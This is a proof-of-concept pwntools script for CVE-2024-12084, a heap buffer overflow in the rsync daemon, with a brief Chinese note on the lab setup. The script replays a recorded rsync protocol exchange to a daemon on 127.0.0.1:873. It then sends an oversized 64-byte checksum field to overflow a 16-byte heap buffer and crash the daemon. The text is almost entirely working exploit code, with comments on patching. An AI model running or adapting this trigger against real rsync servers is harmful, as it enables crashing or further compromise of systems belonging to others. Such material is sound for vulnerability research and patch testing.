Rsync CVE-2024-12084 PoC
默认配置 ftp,远程服务器上放一个 libc.so.6 文件作为测试(文件本身是什么不重要,但是要稍大一些)。
#!/usr/bin/python
# Lab PoC for CVE-2024-12084 (heap buffer overflow in rsync) against a LOCAL
# rsync daemon. Everything is hard-coded for one test setup: rsyncd listens on
# 127.0.0.1:873 with its default config, exposes a module named `ftp`, and that
# module holds a reasonably large file called libc.so.6 (its content is
# irrelevant). The script speaks an otherwise ordinary transfer and then sends
# one oversized checksum field; the crash output is captured via debug logging.
# Defensive note: the only anomaly on the wire is a sum2 field longer than the
# 16-byte maximum, so the mitigation is a patched rsync and not exposing rsyncd
# to untrusted networks.
from pwn import *
# pwntools context: amd64/linux target; log_level='debug' prints every byte
# sent and received, which is the only output this script produces.
context(arch='amd64', os='linux', terminal=['konsole', '-e'], log_level='debug')
binary = './rsync'
io = connect('127.0.0.1', 873) # remote side is `rsync --daemon` (here on localhost)
# The two ELF objects are loaded but never used below; `binary` and the libc
# path are local-lab assumptions (this libc is the LOCAL one, unrelated to the
# libc.so.6 test file on the server).
e = ELF(binary)
libc = ELF('/usr/lib/libc.so.6', checksec=None)
# gdb.attach(p, 'b *$rebase(0x22068)')   # leftover: `p` is never defined here (presumably meant `io`)
# Handshake: echo the daemon's protocol/digest banner back as our greeting.
io.sendlineafter(b'@RSYNCD: 31.0 sha512 sha256 sha1 md5 md4', b'@RSYNCD: 31.0 sha512 sha256 sha1 md5 md4')
# Select the `ftp` module.
io.sendline(b'ftp')
# Replay the normal protocol exchange (server/sender arguments, requested path,
# checksum and compression negotiation) — presumably recorded from a legitimate
# client session, so the daemon reaches the file-transfer phase.
io.sendafter(b'@RSYNCD: OK', bytes.fromhex('2d2d736572766572002d2d73656e646572002d766c6f67447470727a652e694c73667843497675002e006674702f6c6962632e736f2e3600001e7878683132382078786833207878683634206d6435206d64342073686131137a737464206c7a34207a6c696278207a6c69620400000700000000130000070200a0')) # reproduce the normal protocol exchange
# Checksum header sent after the server's prompt:
# cksum count, block length, cksum length, remainder length
io.sendafter(b'root', p32(1) + p32(64) * 2 + p32(0))
# Trigger: 0x07000044 is the message header, 0xcafebabe the sum, and cyclic(64)
# is sum2 — sum2 may be at most 16 bytes, so 48 bytes overflow the heap buffer.
# cyclic() is a recognizable crash pattern, not a working payload.
io.send(p32(0x07000044) + p32(0xcafebabe) + cyclic(64)) # 0x07000044 is the message header, 0xcafebabe is sum, cyclic(64) is sum2 (max 16 bytes, overflows by 48 bytes)
# Read until the daemon closes the connection (expected once it crashes).
io.recvall()
堆缓冲区溢出效果: